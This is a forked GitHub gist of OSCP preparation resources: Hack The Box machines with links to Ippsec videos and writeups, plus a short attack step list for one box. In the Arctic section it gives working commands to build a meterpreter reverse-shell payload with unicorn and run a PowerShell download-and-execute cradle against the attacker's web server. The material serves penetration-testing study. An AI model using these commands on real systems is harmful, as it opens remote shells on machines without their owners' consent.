Skip to content

Instantly share code, notes, and snippets.

@sankhyans
Forked from AvasDream/oscp_prep.md
Created May 24, 2020 21:11
Show Gist options
  • Save sankhyans/71be0492086401fc9b3a12c0dcdc4c6c to your computer and use it in GitHub Desktop.
Save sankhyans/71be0492086401fc9b3a12c0dcdc4c6c to your computer and use it in GitHub Desktop.
Resource for OSCP like HTB Boxes with Ippsec Videos and Writeups.

Sources

Google spreadsheet

Linux Boxes

Lame

Writeup 0xdf

Writeup Rana Khalil - wo msf

Writeup - wo msf

Video Hackersploit


Brainfuck

Writeup Rana Khalil

Writeup - hkh4cks

Writeup - haxys

Video - Ippsec

  1. Nmap
  2. SSL Enum -> Add hostnames to /etc/hosts.
  3. WPscan -> authenticated sql Injection.
  4. WPScan enumerate users.
  5. Searchsploit -> Unauthenticated Admin access
  6. Use exploit html, edit URLs and exploit the vuln.
  7. Login as Admin
  8. Find user SMTP Password in Plugin.
  9. Setup SMTP Client and read emails.
  10. Credentials to Forum in Emails.
  11. Find encrypted Forum Entries.

Takeaways

  • Check SSL Information in Browser for e.g. Emails. And Add Hostnames to /etc/hosts.
  • Use Burp Suite Redirect Proxy set on 127.0.0.1 to point to remote host.
  • Use devtools to uncover censored passwords.

Shocker

Video - Ippsec

Writeup Rana Khalil - wo msf

Writeup codemonkeyism


Bashed

Video - Ippsec

Writeup Rana Khalil

Writeup 0xdf


Nibbles

Video Ippsec

Writeup Rana Khalil

Writeup codemonkeyism

Writeup 0xdf


Beep

Video Ippsec

Writeup Rana Khalil

Writeup codemonkeyism

Writeup John Barradell


Cronos

Ippsec Video

Writeup haao

Writeup teckk2


Nineveh

Video Ippsec

Writeup Rana Khalil

Writeup V3ded

Writeup hk4cks


Sense

Video Ippsec

Writeup absolomb

Writeup Rana Khalil

Writeup V3ded

Writeup Tutorials IT


Solidstate

Writeup Rana Khalil

Video Ippsec

Writeup 0x00sec

Writeup Bernie Lim


Node

Video Ippsec

Writeup Absolomb

Writeup Rana Khalil

Writeup teckk2


Valentine

Writeup Rana Khalil

Writeup v3ded

Writeup Absolomb

Writup Dastinia

Video Ippsec


Poison

Video Ippsec

Writeup Secjuice

Writeup Absolomb

Writeup 0xdf


Sunday

Video Ippsec

Writeup 0xdf

Writeup codemonkeyism


Tartarsauce

Video Ippsec

Writeup David Hamann

Writeup 0xdf

Writeup Cesena


Irked

Video Irked

Writeup 0xrick

Writeup 0xdf

Writeup 0x00sec


Friendzone

Video Ippsec

Writeup 0xrick

Writeup 0xdf

Writeup snowscan


Swagshop

Video Ippsec

Writeup 0xrick

Writeup Snowscan

Writeup 0xdf


Networked

Video Ippsec

Writeup 0xrick

Writeup David Hamann

Writeup snowscan


Jarvis

Video Ippsec

Writeup 0xrick

Writeup snowscan


Mirai

Video Ippsec

Writeup ejento


Popcorn

Video Ippsec

Writeup offsecdeer

Wirteup teckk2


Haircut

Video Ippsec

Writeup hkh4cks

Writeup John Barradell


Blocky

Video Ippsec

Writeup berzerk0

Writeup v3ded

Writeup 0x23b


Frolic

Video Ippsec

Writeup snowscan

Writeup 0xrick

Writeup 0xdf


October

Video Ippsec

Writeup teckk2

Writeup 0xdf


Postman

Video Ippsec

Writeup rizemon

Writeup Secjuice


Mango

Video Ippsec

Writeup thevladestvlad

Writeup snowscan


Windows

Legacy

Video Hackersploit

Writeup


Blue

Video Ippsec

Writeup berzerk0


Devel

Video Ippsec

Writeup Barradell Johns

Writeup 0xdf


Optimum

Video Ippsec

Writeup berzerk0

Writeup teckk2


Bastard

Video Ippsec

Writeup 0xdf

Writeup teckk2


Granny & Grandpa

Video Ippsec

Writeup 0xdf

Writeup Hok


Arctic

Video Ippsec

Writeup offsecdeer

Writeup UNC Chapell Students

Take aways:

Use Unicorn to upgrade shells

unicorn windows/meterpreter/reverse_tcp $local_ip $local_port

This will generate one rc file for msf and one powershell script.

Start metasploit:

msfconsole -r unicorn.rc

Cut the powershell payload to only the part in double quotes and save in shell.html

Start a local webserver to serve file.

python -m http.server 80

Execute in windows console

powershell "IEX(New-Object Net.WebClient).downloadString('http://$IP/shell.html')"

Silo

Video Ippsec

Writeup v3ded

Writeup 0xdf

Writeup dastinia


Bounty

Video Ippsec

Writeup Rana Khalil

Writeup 0xdf


Jerry

Video Ippsec

Writeup David Hamann

Writeup 0xrick


Conceal

Video Ippsec

Writeup 0xrick

Writeup snowscan

Writeup 0xdf


Chatterbox

Video Ippsec

Writeup codemonkeyism

Writeup absolomb

Writeup 0x23b


Forest

Video Ippsec

Writeup snowscan

Writeup rizemon


Bankrobber

Video Bankrobber

Writeup snowscan

Writeup xploit


Secontes

Video Ippsec

Writeup snowscan

Writeup 0xrick


Bastion

Video Ippsec

Writeup 0xrick

Writeup snowscan


Content Creators

Thank you for your work which is making the oscp preparation an awesome experience.

Teck__K2

TJ_Null

Rana Khalil

David Hamann

Snowscan

Jack Baradell

V3ded

0x23B

Rene Graf

Hrushikesh

Dean Williams

0xdf

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment